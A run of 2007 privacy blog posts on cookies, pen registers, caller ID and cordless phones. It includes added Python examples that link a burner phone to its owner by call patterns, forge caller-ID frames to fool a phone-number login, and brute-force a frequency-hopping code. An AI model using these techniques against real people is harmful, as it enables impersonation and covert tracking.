Recently there was a flurry of search engine companies all touting changes to their cookie lifetime policies. As Google decided to go to 18 months for its cookies, other search providers followed suit or tried to one-up them with shorter retention periods. The thing to understand here is that, although this sounds like a privacy win for consumers, it is really fairly unimportant. Cookies help sites know who you are. This is especially important for sites that hold personally identifiable information (PII) on their users, and the major search companies all run email services holding their users' information (both what was given at sign-up and what is in the message contents). Although it is true that people can give false information, the truth is that most people are honest. The new policies say that a year and a half after the last time you visit one of their sites, the cookie they put on your machine will expire. This means that every time you go to one of that company's properties, the year-and-a-half clock gets reset. So what's the catch? Remember that the majority of advertising on the net (and advertising is the monetization strategy for most of the web) is run by these same companies. This means that even if you don't go to Google (or Gmail, Orkut, etc.) for a year and a half, the cookie still isn't gone, since you almost surely visited a site in that period that carries ads from Google's ad network (full disclosure: Blogger, where this blog is hosted, is owned by Google), and that ad request counts as a visit as far as the cookie is concerned. Yahoo and MSN/Live are much the same (though Google has the vast majority of the search and ad traffic on the net). So although in theory there is a way for this data to go away, in reality it is quite unlikely that it will. Also, remember that a cookie is just an identifier; the real information about you is stored on the company's servers.

This means that if you choose to delete your cookies (all browsers have this option and most can even block them), the profile already built about you stays on their servers, and the next time you visit one of these sites a fresh cookie will be put back on your computer. The real key is what happens with the information.

Search/ad companies really aren't that interested in tracking "you"; they are interested in tracking who you are. They do this not out of some Orwellian desire to observe and control; they do it because it helps them sell more relevant ads to clients who pay more money to get their ads shown to the people they want to target. By seeing where you go and what you write in your emails (yes, Gmail does an automated scan of all of your email), these companies can build a profile of who you are and what you are interested in. Much as the old market research companies used to pay people to see what was in their pantries and form customer profiles from that, ad companies now do the same thing. In and of itself, this may bother people who jealously guard their privacy, but most people seem to feel OK with it. Where it gets more concerning is when these data stores are used for personal tracking/monitoring purposes. For example, assume you search for bomb-making materials while researching a book, or for child pornography to help the police track down those who take part in such acts. Such systems may be used by the police/FBI to indicate that you are a person who needs to be watched. The analogy would be someone knowing what you buy and what you're reading at the library. Prior to the USA PATRIOT Act, such searches by the government were illegal; the reasoning was clear, it was an unreasonable invasion of privacy and the Constitution forbade such dragnet searches. When information is gathered and tracked, even for innocuous reasons, it becomes a rich target for those who would want to exploit it (FBI records on Republican rivals in Congress "mistakenly" ended up in the Clinton White House (Filegate), and the K Street Project used access to pressure lobbyists and donors into giving only to Republican candidates).

Like many things in the privacy world, it is the aggregation of information and then the ability of others to access it that makes the implications scary. When AOL released a large block of its search data, the implications became immediately apparent: users were identified by name from their queries within days.

If you are interested in limiting the information these companies keep about you, you should think about whether you want to allow cookies from those sites. Furthermore, since your IP address can be used to identify a machine (a MAC address, for what it's worth, never leaves your local network, so a remote site cannot see it), using an anonymizing network like Tor would add another layer of protection. There are also a couple of decent articles on hiding your search tracks here and here.

Sunday, August 5, 2007

PEN registers don’t sell PENs

To grasp the way that some internet data is traced today (issues for a later posting) it is important to look at the past (and, as it turns out, the present). The past part is the pen register. A pen register is a device that was attached to phone company switches and used to record the numbers called and the times those numbers were called. These devices could be set up without a warrant, as they do not record the contents of the call. This was a wonderfully effective tool against phone harassers and organized crime, as well as phone phreaks who would use other people's calling cards to call all around the world to connect to BBSs (Bulletin Board Systems, the precursor to today's internet communities). Since courts found pen registers legal because they didn't intrude on the content of the communication, it has naturally been extrapolated that the same is true for internet traffic (the courts have been selective about which "old" technology internet communications are compared to, and in almost all cases have ruled that your internet communications have far less protection than traditional personal speech, land-line phone calls, or US mail).

From a privacy standpoint, the fact of the call (or of the internet connection) may still contain information a user would not want made available: a whistleblower calling a reporter or a government agency, or someone calling an AIDS clinic or Planned Parenthood, strongly insinuates things, even if the assumptions drawn are incorrect. Because of this, many folks in organized crime (and phone phreaks) began using public phones; they could always go to another one, and this made tracing much more difficult. The equivalent today would be pay-as-you-go cellular phones, though these are monitorable and the records of their calls are kept, so there is still a record; users of this approach rely on the "security through obscurity" model, and we'll discuss in the future why that isn't a great way to protect your privacy. On the internet people use programs like Tor to obscure who they are connecting to. This may be of additional concern since Congress passed a bill this week increasing the government's eavesdropping and snooping abilities.
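Why a pay phone or a prepaid handset is obscurity rather than anonymity, as an added example that is not from the original post (the numbers and call records are constructed): a pen register never sees what was said, but the set of numbers a phone calls is a fingerprint. Line a burner's callee set up against every known subscriber's and the owner usually falls out, and a single call to a sensitive number is visible regardless of who is holding the handset.

```python
"""Contact chaining over pen-register style records: link an unknown (prepaid)
number to a known subscriber by the overlap of who each one calls, and flag
calls to sensitive numbers. Added example; all numbers and records are
constructed."""
from collections import defaultdict

# (caller, callee, start time). 555-01xx are constructed subscriber numbers.
RECORDS = [
    ("555-0100", "555-0201", "2007-08-01T09:00"),
    ("555-0100", "555-0202", "2007-08-01T12:30"),
    ("555-0100", "555-0203", "2007-08-02T18:05"),
    ("555-0100", "555-0204", "2007-08-03T08:15"),
    ("555-0199", "555-0201", "2007-08-04T09:10"),  # prepaid 'burner' phone
    ("555-0199", "555-0202", "2007-08-04T13:00"),
    ("555-0199", "555-0203", "2007-08-05T18:20"),
    ("555-0199", "555-0301", "2007-08-05T20:00"),
    ("555-0150", "555-0301", "2007-08-02T10:00"),  # unrelated subscriber
    ("555-0150", "555-0302", "2007-08-02T11:00"),
]

# Constructed labels: the kind of number whose mere dialling is revealing.
SENSITIVE = {"555-0203": "newspaper tip line", "555-0302": "clinic"}


def callee_sets(records):
    """Who each caller has dialled: content-free, exactly what a register logs."""
    out = defaultdict(set)
    for caller, callee, _ in records:
        out[caller].add(callee)
    return out


def jaccard(a, b):
    """Overlap of two contact sets, 0.0 (disjoint) to 1.0 (identical)."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def rank_owners(records, unknown):
    """Rank every other caller by how much its contact set resembles the
    unknown number's. The top entry is the most likely owner of the burner."""
    sets = callee_sets(records)
    target = sets[unknown]
    scores = [(c, jaccard(target, s)) for c, s in sets.items() if c != unknown]
    return sorted(scores, key=lambda cs: cs[1], reverse=True)


def sensitive_calls(records, sensitive=SENSITIVE):
    """Every (caller, label, time) where a flagged number was dialled. Content
    is unknown; the inference is drawn from the destination alone."""
    return [(caller, sensitive[callee], when)
            for caller, callee, when in records if callee in sensitive]


if __name__ == "__main__":
    for number, score in rank_owners(RECORDS, "555-0199"):
        print(f"{number}: contact overlap {score:.2f}")
    for caller, label, when in sensitive_calls(RECORDS):
        print(f"{caller} called the {label} at {when}")
```

Real analysis adds time-of-day and cell-site correlation on top of contact overlap, but the toy version already shows the point: the burner shares three of its four contacts with 555-0100, and swapping handsets did nothing to hide that.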

In other news: Dateline associate producer Michelle Madigan was outed this week while attending the hacker convention DEF CON. Apparently she had gone undercover, and the organizers didn't seem to like the idea of someone trying to get attendees to admit to felonies on camera to shock the "folks in Kansas". Welcome to a strange turn on the previous topic of the conflict between free speech/free press and privacy.

Sunday, July 29, 2007

C is for Cookie

If you grew up with Sesame Street then you probably remember that Cookie Monster (that lovable blue cookie-eating machine) loved cookies. Alas, the cookies in your web browser are a bit different. For those who are unaware, cookies are one of the ways a web site can save little bits of information on your computer. These bits of information are stored so that websites can remember things about you.

Although there are other ways to track users online (Flash "super cookies" (Local Shared Objects), the Windows Media Player user ID, XML data islands, etc.), cookies are by far the most common. (Why you might care about this is dealt with in my post about behavior-based marketing, which will go up next week.) The concern for privacy comes in two ways: one is the cookies on your machine, and the other is what sites do with your cookies. A cookie from a site, by definition, means that you were on that site (unless you've placed a fake cookie on your machine to make it look like you were there, which is quite uncommon). Some hackers will try to steal, or corrupt, your cookies to create desired effects (access to webmail accounts, for instance). Sites use cookies to know when you are coming back to them. Cookies come in several varieties: session cookies, 1st-party cookies and 3rd-party cookies. Session cookies are only good for the time you are using your web browser; once you close it, those cookies are gone (or expired). 1st-party cookies are sent to your machine by the site you are on, for that site (a cookie should only be returned to the site that sent it to you; hackers sometimes get around this). 3rd-party cookies are set by sites that you aren't on but that are showing you material (the most common case is advertising that comes from an advertiser's server but is shown on a different site). All cookies have the ability to set an expiration date after which they are no longer valid; many sites set these far off into the future.

Many browsers now give you the ability to manage cookies in various ways, though (according to someone I spoke to in internet marketing) most people never alter their cookie settings, so marketers don't worry about the small fraction of users who do. Each user can decide what they want to block or allow (making this automatic, or having the browser prompt you each time; note that prompting sounds like it gives you the most options but is really a pain in the butt, try it and you'll see). You usually can choose to always block (or allow) cookies from various sites (and some sites won't let you use them without cookies enabled). One thing most people don't realize is that if you choose to block (or allow) cookies from a particular site, that decision is stored on your machine. If someone were to search your machine they could tell what sites you had been to (or not) based upon which cookies you chose to block or accept. This information is generally not transmitted across the net (unless your machine is hacked), so someone would need physical access to your machine to obtain it, but it is a trail for those who are concerned about such things.

In general it is important to understand how information about you and your browsing activities is tracked. There are easy ways to limit this tracking, and cookies are the primary way websites do it. If you are concerned, you can disable these technologies in most browsers, but many of the measures greatly diminish your online experience. Examples: always clearing your cache, not accepting cookies, not installing plug-ins/add-ons like Windows Media Player or Flash, disabling JavaScript, etc.
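Both the cookie-lifetime point in the search-engine post above and the cookie varieties described here can be made concrete. The following is an added example, not code from the original post: it classifies Set-Cookie headers as session or persistent and as first- or third-party relative to the page you are on, then walks a constructed browsing history to show why an "18-month" tracking cookie from a search company that also runs an ad network practically never lapses. The hosts, header values and visit dates are constructed, and the domain matching is a crude last-two-labels rule rather than a real public-suffix list.

```python
"""Classify Set-Cookie headers and simulate how a tracker's 18-month cookie is
renewed by ad impressions on unrelated sites. Added example; hosts, headers and
the visit history are constructed."""
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

EIGHTEEN_MONTHS = timedelta(days=548)
DEMO_NOW = datetime(2007, 8, 12, tzinfo=timezone.utc)   # constructed 'today'


def registrable_domain(host):
    """Crude eTLD+1 for the demo (last two labels); real browsers consult the
    public-suffix list, which this deliberately does not."""
    return ".".join(host.lower().split(".")[-2:])


def classify_cookie(set_cookie_header, response_host, page_url, now=DEMO_NOW):
    """Describe each cookie in one Set-Cookie header: who set it relative to
    the page being viewed, and whether it dies with the browser session."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    page_host = urlsplit(page_url).hostname
    party = ("first" if registrable_domain(response_host) == registrable_domain(page_host)
             else "third")
    result = {}
    for name, morsel in jar.items():
        expires = None
        if morsel["max-age"]:                       # Max-Age takes precedence
            expires = now + timedelta(seconds=int(morsel["max-age"]))
        elif morsel["expires"]:
            expires = parsedate_to_datetime(morsel["expires"])
        result[name] = {"party": party,
                        "kind": "session" if expires is None else "persistent",
                        "expires": expires}
    return result


def identifiers_issued(visits, tracker_domains, lifetime=EIGHTEEN_MONTHS):
    """Walk a chronological history of (when, hosts contacted while loading the
    page). Any contact with the tracker's domains, including an ad it serves on
    someone else's site, re-sends the cookie with a fresh expiry. Returns how
    many distinct identifiers the tracker had to issue: 1 means one unbroken
    profile for the whole history."""
    issued, expires = 0, None
    for when, hosts in visits:
        if expires is not None and when >= expires:
            expires = None                          # browser discarded the cookie
        if any(registrable_domain(h) in tracker_domains for h in hosts):
            if expires is None:
                issued += 1                         # no cookie presented: new id
            expires = when + lifetime
    return issued


def demo_histories(start=DEMO_NOW):
    """Two constructed histories. In the first the user avoids the search site
    for over a year but reads a news site carrying its ads; in the second the
    user simply stays away for 600 days."""
    def day(n):
        return start + timedelta(days=n)
    with_ads = [(day(0), {"www.example.net"}),
                (day(400), {"news.example.org", "ads.example.net"}),
                (day(800), {"news.example.org", "ads.example.net"}),
                (day(1200), {"www.example.net"})]
    without = [(day(0), {"www.example.net"}), (day(600), {"www.example.net"})]
    return with_ads, without


if __name__ == "__main__":
    print(classify_cookie("uid=xyz; Max-Age=47347200; Domain=.example.net",
                          "ads.example.net", "http://news.example.org/"))
    with_ads, without = demo_histories()
    print("ids issued, ad-supported web:", identifiers_issued(with_ads, {"example.net"}))
    print("ids issued, no ad contact:   ", identifiers_issued(without, {"example.net"}))
```

Blocking third-party cookies in the browser is what breaks the first history: the ad request on news.example.org then carries no cookie, so the tracker cannot tie it to the earlier search visit.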

Sunday, July 22, 2007

I'm Telling: The Conflicts of Privacy and a Free Press

So one of the things that wasn't immediately obvious to me before reading A Right to Privacy is the conflict between a free press and privacy. The best example I have of this is the paparazzi and celebrities. On a level most of us are more familiar with, think of your best friend who told a secret you confided to them in 6th grade. In both cases, information you would rather have kept secret is now very public. The question this raises is what limits there are on the press's ability to print information (or someone's ability to speak it). In general we have laws that protect against the spreading of untruthful information (slander and libel), and this is one of the major differences between our sense of free speech and that in Britain (where the burden is on the speaker to prove what they said was true, and the bar for liability is much lower). So there is "free speech", but not "speech that is free from consequences", if it is false. Well, what if that "speech" is true, but obtained by questionable means (eavesdropping on your phone calls, reading your emails, searching your trash, etc.)? This is where we get into the interesting bits. It may be a low-grade move to go ask your neighbors if they notice anything about you (such as John Ashcroft's TIPS program), or to intercept your internet transmissions (such as the Carnivore system used by the FBI), but how do you protect such information (like being on the DC Madam's call list, http://www.dcphonelist.com/, or responding to an ad on Craigslist, http://www.encyclopediadramatica.com/index.php/RFJason_CL_Experiment) from becoming public? In general we hold the belief that we have no expectation of privacy in information we give away freely, but even that theory is flawed, as in the case of your social security number given to an employer or a tax return (another factor is whether the information is considered of public interest, which tends to affect celebrities but not "regular folks"). So how do we draw the line?

That is a question that is left up to our legislators. The press is, in most cases, not state-run, so the constitutional limits on government (the 4th and 14th amendments) don't apply to it. In a society of totally free press and free information, there would be no secrets (think of an Orwellian dystopia where the government runs the newspaper). In a society with total privacy, there would be no freedom of speech (think of it like an extrapolated version of Cheney's energy commission).

Sunday, July 15, 2007

Caller ID: A Profile In How An Issue Can Change

So by now we are all well acquainted with caller ID, the technology that lets you see what number is calling before you pick up the phone. Originally this technology was sold to people at an added cost as a way to screen calls and do away with "crank" calls. Callers could "opt out" by dialing *67 before a number so that they showed as unlisted on the recipient's caller ID. The phone companies then sold additional services to permanently block your number (a nice way to get you coming and going, though this is really no different from paying to have your number unlisted). At the time, people opposed caller ID on the grounds that it would be used as a means of discrimination. The example given was that organizations like banks would use the data to route calls from low-income areas to lines with fewer representatives. Nonetheless, caller ID became a standard feature on most phone plans, and to my knowledge there haven't been any large cases of such segmentation (mostly, I would presume, because banks have found better ways to segment, such as asking for your account number when you call and then routing you based upon the credit rating they have given you).

One important distinction with the caller ID implementation was that although you could block your number when you called someone, you could not block it from the government. This was justified by the need for criminal investigations and finding 911 callers.

It didn't take long for phone phreaks (think of them as the hackers of today, only focused on manipulating phone systems; they had their heyday in the 80s and 90s) to figure out how this system worked and how to manipulate it. At first this was through phone redirectors (such as calling card dial-ups), but these always showed the number of the dial-up (much like calling cards today, or calls from a corporate PBX). Since even this gave away some information, others found ways to transmit a second caller ID burst to overwrite the original with new data, or to loop through a PBX programmed to send whatever caller ID information the caller wanted (services like this are still advertised on the internet). It didn't take long for telemarketers to pick up these techniques as a way to get people to answer their phones (this was pre-call-block list). Because of this spoofing, various laws were considered to make spoofing your caller ID information a crime. In my mind this is a little like saying we would prosecute John Jay, Alexander Hamilton and James Madison (the writers of the Federalist Papers) for signing them PUBLIUS, or prosecuting you for not identifying yourself to the police (strangely enough there was a case on this where the court said you do have to give your name to the police: the 2004 Supreme Court decision in the Hiibel case).

Today concerns about phone numbers being used for discrimination are mostly assuaged, since the ubiquitous use of cell phones, number portability, and pay-as-you-go SIM cards make phone numbers almost meaningless as a proxy for where you live. There are new issues arising, though. Some services (twitter.com is an obvious example) rely on caller ID as a personal identifier (login credential). Caller ID spoofing allows people to manipulate such tools, and the government is moving (along with private groups) to stop this. It is a trade-off of anonymity for utility. What should be most concerning is how this evolution of technology has kept one thing stable: government control. With each step in this process, the public has given up some of its privacy/anonymity in exchange for not just security but in some cases convenience (a common theme in privacy issues). What is more disturbing is that with each of these steps, the government has been able to protect its interests. In a way this allows the government to ensure that private groups cannot oppose it, because it has a different set of rules to play by than the rest of us.
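What makes spoofing easy is that the caller ID signal is just a short data burst sent between the first and second ring, protected by a checksum against line noise and by nothing against a deliberate sender. The following is an added example, not code from the original post: it builds and parses the single data message format (SDMF) frame, then shows that a service which "logs you in" by caller ID accepts a frame anyone with a PBX can construct. The number, timestamp and enrolled list are made up for the demonstration.

```python
"""Caller ID (SDMF) frame: build, verify and parse. The checksum detects line
noise; it does not authenticate the caller. Added example; the number, date and
enrolled list are constructed."""

SDMF_TYPE = 0x04          # single data message: date/time followed by number


def sdmf_encode(month, day, hour, minute, number):
    """Bytes a central office (or a PBX under the caller's control) sends between
    the first and second ring: type, length, MMDDHHMM, digits, checksum."""
    if not number.isdigit():
        raise ValueError("calling number must be digits")
    body = f"{month:02d}{day:02d}{hour:02d}{minute:02d}".encode("ascii") + number.encode("ascii")
    if len(body) > 255:
        raise ValueError("message too long")
    frame = bytes([SDMF_TYPE, len(body)]) + body
    checksum = (-sum(frame)) & 0xFF   # two's complement of the modulo-256 sum
    return frame + bytes([checksum])


def sdmf_valid(frame):
    """True when the frame is well formed and its bytes sum to 0 modulo 256."""
    return (len(frame) >= 3 and frame[0] == SDMF_TYPE
            and len(frame) == frame[1] + 3 and sum(frame) & 0xFF == 0)


def sdmf_decode(frame):
    """Parse a frame into its fields. This is every check a receiving phone or
    modem can make; nothing here proves who actually sent it."""
    if not sdmf_valid(frame):
        raise ValueError("not a valid SDMF message")
    body = frame[2:2 + frame[1]].decode("ascii")
    return {"date": body[:4], "time": body[4:8], "number": body[8:]}


def accepts_caller(frame, enrolled_numbers):
    """A service that treats the presented caller ID as a login credential."""
    try:
        return sdmf_decode(frame)["number"] in enrolled_numbers
    except ValueError:
        return False


if __name__ == "__main__":
    victim = "2125550123"
    real = sdmf_encode(7, 15, 10, 30, victim)
    print(real.hex(), sdmf_decode(real))
    # An attacker whose PBX lets them set the outbound number sends exactly the
    # same thing; the receiver has no way to tell the two frames apart.
    forged = sdmf_encode(8, 19, 9, 0, victim)
    print("service accepts forged frame:", accepts_caller(forged, {victim}))
```

The practical consequence for anyone building a phone-based login is that the presented number is a hint, not an identity; a callback to the enrolled number, or a one-time code, is what actually proves possession.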

In hindsight, caller ID is an interesting case: it has gone from a screening tool, and fears of discrimination, to a tool of identification that legislators now want to protect from being faked. It is a technology that can be hidden from private parties but not from the government (and in that lies the concern). Information in the hands of a benevolent government can advance the public interest, but if such a government were to use that information against its people, having such access allows another level of control over the population. Our forefathers designed a country with protected rights because they had grave concerns about abuses of power by the government. We should think about what trade-offs we are making with our decisions and how those decisions shift the balance of power.

Monday, July 9, 2007

Cordless Phones: All your base (stations) belong to us

Everyone knows that eavesdropping isn't polite. We've also all had the experience of accidentally overhearing something in a conversation (in many cases out of context). Since we can hardly hold people accountable for hearing what others say within earshot, we are usually on our own to protect our privacy in such situations. This becomes a bit more complicated when you put a phone into the mix. The transmission of a phone conversation across the telephone lines is a protected form of confidential speech, and recording such conversations is illegal without consent (in some states you need one party's consent (or a judge's order); in others, like California, you need both parties' consent (or a judge's order)). These wiretapping provisions also apply to wireless phone transmissions, with a historical wrinkle: although the government needs a warrant to listen in on your wired (land line) calls, eavesdroppers have not always needed one for cordless calls (http://caselaw.lp.findlaw.com/casecode/uscodes/18/parts/i/chapters/119/sections/section_2510_notes.html). The 1986 wiretap statute originally carved the radio portion of a cordless call out of its protection; that carve-out was removed in 1994, but the practical reality has not changed: cordless calls are broadcast, and anyone who can receive the broadcast can hear what you are saying. Since you are broadcasting, the argument goes, you have no reasonable expectation of privacy (we'll talk more about this in another posting).

In the 80s and 90s this meant not only that government listening to people's phone calls became much easier, but that private parties could listen in with greater ease (note there is a distinction between what people or the government can do, and what they can do legally; recording something might put you (or the government) afoul of some laws, but it doesn't stop information gathering, legal or otherwise). In many cases people would take a cordless phone handset and walk around their neighborhoods (a radio scanner would work as well) and just switch channels until they tuned into someone's conversation. The handset method also allowed people to pick up unused base stations (where your phone rests to recharge) and use their line to make long-distance calls for free (or local calls that were much harder to trace to the person making them). Several advancements over the years have made this more difficult. Phones have moved to new frequencies (higher frequencies mean people need newer equipment to listen in, but the greater the range of your phone, the farther away an eavesdropper can be). Phones also started locking the base station when the handset was in the charger (a modest improvement). Another improvement was frequency hopping (exactly what it sounds like: the call jumps between channels in a pattern the handset and base share). Perhaps the biggest change was the move to spread spectrum technology.

Spread spectrum technology spreads the conversation out over the entire frequency band. This defeats traditional monitoring tactics, as no single frequency carries enough signal to make it appear that anything is being transmitted. The technique was developed for military use in WWII and only in the 90s found its way into civilian equipment.

What is of note in all of these changes is that every one of them can still be intercepted. Private parties have to jump through more, and more expensive, hoops to continue to eavesdrop, but government surveillance still has the ability to listen in without the burden of the warrant that land lines require. What is also worthy of note is that although the technology has evolved, the one thing that would seem the most effective way to protect the privacy of phone users, encryption, has never been offered (another article will discuss encryption of communications).
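The difference between spreading a signal and encrypting it is worth seeing in numbers. The following is an added example, not code from the original post: it models frequency hopping (the simpler of the two spread-spectrum techniques the post describes) by sending each symbol of a message on a pseudo-randomly chosen channel. A scanner parked on one channel catches only scraps, a receiver that knows the hop schedule recovers everything, and if that schedule comes from a small code, as on a cordless handset that pairs with its base, an eavesdropper can simply try every code. The channel count, the code, the message and the use of Python's random module as the schedule generator are all constructed for the demonstration.

```python
"""Frequency hopping model: a narrowband scanner hears scraps, anyone with the
hop schedule hears everything, and a small hop code can be brute-forced.
Added example; channel count, code and message are constructed."""
import random

CHANNELS = 50          # constructed band: 50 narrowband channels
MESSAGE = ("the quick brown fox jumps over the lazy dog, and says so at length so "
           "that a parked scanner has something to miss. ") * 3


def hop_sequence(code, length, channels=CHANNELS):
    """One channel per symbol, derived from the code shared by handset and base.
    random.Random stands in for the real generator; the weakness shown is the
    size of the code space, not the generator."""
    rng = random.Random(code)
    return [rng.randrange(channels) for _ in range(length)]


def transmit(message, code):
    """Put each character 'on the air' as a (channel, symbol) pair."""
    return list(zip(hop_sequence(code, len(message)), message))


def scanner_on_channel(air, channel):
    """Fixed-frequency eavesdropper: sees only symbols that land on its channel."""
    return "".join(sym for ch, sym in air if ch == channel)


def receiver(air, code):
    """Retunes every symbol according to its own copy of the schedule."""
    wanted = hop_sequence(code, len(air))
    return "".join(sym for (ch, sym), want in zip(air, wanted) if ch == want)


def best_fixed_channel_fraction(air, channels=CHANNELS):
    """Share of the message the luckiest single-channel scanner recovers."""
    return max(len(scanner_on_channel(air, c)) for c in range(channels)) / len(air)


def brute_force_code(air, known_prefix, code_space):
    """Try every code; the right one yields plaintext that starts with the
    known prefix (every cordless call starts with a predictable 'hello')."""
    for code in range(code_space):
        if receiver(air, code).startswith(known_prefix):
            return code
    return None


if __name__ == "__main__":
    air = transmit(MESSAGE, 777)
    print("best fixed channel recovers %.0f%% of the message"
          % (100 * best_fixed_channel_fraction(air)))
    print("receiver with the code:", receiver(air, 777) == MESSAGE)
    print("code recovered by brute force:", brute_force_code(air, "the quick", 2048))
```

Hopping raises the cost of a casual scanner from zero to "own a wideband receiver and know the algorithm", which is real but finite; encryption with a proper key is what would make the captured symbols useless even to someone who follows every hop.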

From the user's perspective, the critical thing here is that your phone calls are most protected from privacy invasion when you use traditional land line communications. When you add the convenience of wireless, you are giving up some of the potential privacy of your conversation.

Sunday, July 1, 2007

If privacy is so important, why didn’t our founding fathers write it into the constitution or the bill or rights?

Ok, let’s start the way all my favorite folks started, by answering a question with a question. That question is, “How many of our founding fathers signed the original Declaration of Independence?” Seems simple right? After all we’ve seen that document with that big John Hancock signature at the bottom. But how many of them signed the original document? The question is a bit of a trick, since we know there is a huge list (56) of them that eventually signed it. The trick is that they signed it in August after the first draft was distributed (the original was only signed by two people). Why? Well for one, because signing such a document would be considered an act of treason and as Benjamin Franklin reminded those at the signing that,”We must all hang together, or we shall surely hang separately.” The privacy and anonymity of their thoughts and speech was clearly something that was top of mind for these men.

The Supreme Court has referred to a right of privacy on many occasions and in most of these, the fourth amendment is the usual starting point. For those that are trying to remember their civics lessons, that’s the one that says that you should be protected from unreasonable search and seizure (technically this only applied to the federal government but the 14th amendment expanded this to protection from state’s governments as well).

This is where it gets much grayer. Some people view the fourth amendment as meaning exactly what it says, with no logical extrapolation or allowance for changes in technology. Others feel that it expresses an intent that should expand to encompass new technologies and realities. The Supreme Court over the years has expressed opinions running the gamut on this issue, so it is safe to say that this is an undecided question (as an aside, Roe v. Wade is actually based on a right to privacy). This is where the debate about whether we have a right to privacy, and to what extent, comes from. In later posts we will look at what this means from the standpoint of private citizens and corporations (which the law treats as persons).

Sunday, June 24, 2007

Why does privacy matter?

One of the questions a number of people have posed to me is, "Don't only those who have something to hide need to worry?" To this I offer some sad reminders of history that are probably best summarized in Martin Niemöller's famous poem about those who came for the communists, Jews and socialists, and his inaction on these occasions leading to the time when they came for him; and how there was no one left to stand up for him. It's a statement about solidarity against power, but it's also a statement about privacy. Some group affiliations are obvious (race and gender being examples) while others are less so (sexual orientation, religion, political affiliation). All of these have been (or currently are being) used by those in power (or seeking power) to exclude, intimidate, attack or marginalize groups who oppose them. Here in the United States, having the name Mohamed on Sept. 10th, 2001 wouldn't have bothered too many people. It certainly wouldn't have caused any extra scrutiny in your life. All of that changed in less than 24 hours. The cautionary tale here is that even those who feel they don't have anything to hide can find that they do have something about them that they don't wish to be public if circumstances change.

A society without privacy will almost certainly regress to a set of accepted social norms. Those in that society then face the challenge of deciding if they want to try to change those norms (which invariably carries a high personal cost in persecution and intimidation, as well as possible imprisonment or death). Few people are willing to make such a sacrifice, and that is how the social norms get enforced. If you do not want a diverse society, this may indeed seem like a benefit; at least until the society decides that you are now among those who do not fit its new norm. Think that can't happen? Look at Jews in Germany circa 1930 versus 1940, or at the Japanese in the US over the same period.

Many things are changing in our world. With the growth of our surveillance society, and the changing nature of what is considered constitutionally protected; not to mention the growth of data collation technology in the hands of private parties, we will all face a set of questions around privacy in our lives that previous generations never had to face. Those issues will range from when a police officer can search you, to how long a company can keep records of where you went on the Internet. We will all live more public lives than any other generation in history whether we like it or not. We all do things that some day we may not want to be reminded of, let alone have available to the public (for me I think some of my college stunts and Jr. High clothing selections fall into a slightly innocuous, though no less serious, collection of things I’d rather keep private). In any event, since employers have started to run background checks (including credit checks) on employees, the government is looking at library checkouts and advertising companies are monitoring what websites you go to; you may want to ask yourself, "Is this information I really want anyone/everyone to have?" If your answer is the predictable, “No, it’s private” then you grasp why privacy is important.

Sunday, June 17, 2007

Why am I writing my personal thoughts on private issues?

If you’re reading this, I’m going to assume that you have at least a curiosity about privacy. Indeed, it’s an issue that many of us take for granted while we concurrently give away more data than we realize. Many people have written about this topic and have approached it, in my own thinking, from many different angles. My intent with this blog is simply to chronicle the things that I come across in the realm of privacy and my evolving ideas on the point. Why am I doing this? Well, I think it’s something that many people don’t think too much about until it’s too late. Whether you jealously guard your privacy, fiercely manage your image (can you say Politicians? I knew you could), or live an open-book life (Twitter and MySpace users come to mind), the concepts of privacy play a role in who we are and how we will be perceived. Indeed, the use of this kind of information may become the most important influence on many of our lives in the coming decades.

The danger in letting something private out is that it is almost impossible to ever make it private again. Like the genie in the bottle, once something is in the “open” it is almost impossible to put it back. Opening up the Pandora’s box of privacy may bring forth unknown consequences that we only fully appreciate after the damage has been done.

I don’t consider myself much of a conspiracy theorist, and I’m not a zealot who envisions an Orwellian future, but I am someone who thinks that far too few people really think about their privacy and what it is really worth. Many more don’t really think about what leading a public life will mean to society. It is these issues that I think need to be raised and discussed; then, as a society, we can decide what we want to allow. I believe in an informed populace, but those who seek to violate others’ privacy rarely advertise their actions. My hope is that we will never end up in a world where our private information is used against us, but this might be a bit naive; after all, there are more than a few examples of this kind of thing already (Ted Haggard, come on down!).

So it is with two goals that I decided to start this blog: to bring my thoughts on privacy to the public (the irony is not lost on me) in hopes of furthering the public debate on the idea, and to inform those who are interested about some of the privacy issues in our world that you might not know about. I am not a professional blogger, but you are welcome to comment here in the blog or email me personally.